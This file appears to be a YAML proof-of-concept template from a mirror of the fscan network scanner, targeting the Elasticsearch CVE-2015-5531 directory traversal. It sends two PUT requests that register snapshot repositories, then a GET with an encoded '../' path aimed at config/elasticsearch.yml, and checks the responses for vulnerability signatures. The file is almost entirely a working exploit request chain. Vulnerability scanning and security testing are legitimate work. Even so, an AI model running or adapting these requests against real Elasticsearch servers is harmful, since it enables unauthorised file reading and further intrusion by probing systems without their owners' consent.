mirror of https://github.com/qwqdanchun/fscan.git
43 lines
1.4 KiB
YAML
43 lines
1.4 KiB
YAML
name: poc-yaml-elasticsearch-cve-2015-5531
|
|
set:
|
|
r1: randomLowercase(4)
|
|
rules:
|
|
- method: PUT
|
|
path: /_snapshot/{{r1}}
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
body: |-
|
|
{
|
|
"type": "fs",
|
|
"settings":{
|
|
"location": "/usr/share/elasticsearch/repo/{{r1}}"
|
|
}
|
|
}
|
|
follow_redirects: true
|
|
expression: |
|
|
response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
|
|
- method: PUT
|
|
path: /_snapshot/{{r1}}2
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
body: |-
|
|
{
|
|
"type": "fs",
|
|
"settings":{
|
|
"location": "/usr/share/elasticsearch/repo/{{r1}}/snapshot-backdata"
|
|
}
|
|
}
|
|
follow_redirects: true
|
|
expression: |
|
|
response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
|
|
- method: GET
|
|
path: >-
|
|
/_snapshot/{{r1}}/backdata%2f..%2f..%2f..%2fconfig%2felasticsearch.yml
|
|
follow_redirects: true
|
|
expression: |
|
|
response.status == 400 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"error\":\"ElasticsearchParseException[Failed to derive xcontent from")
|
|
detail:
|
|
author: ha9worm(https://github.com/ha9worm)
|
|
links:
|
|
- https://www.cnblogs.com/sallyzhang/p/12457031.html
|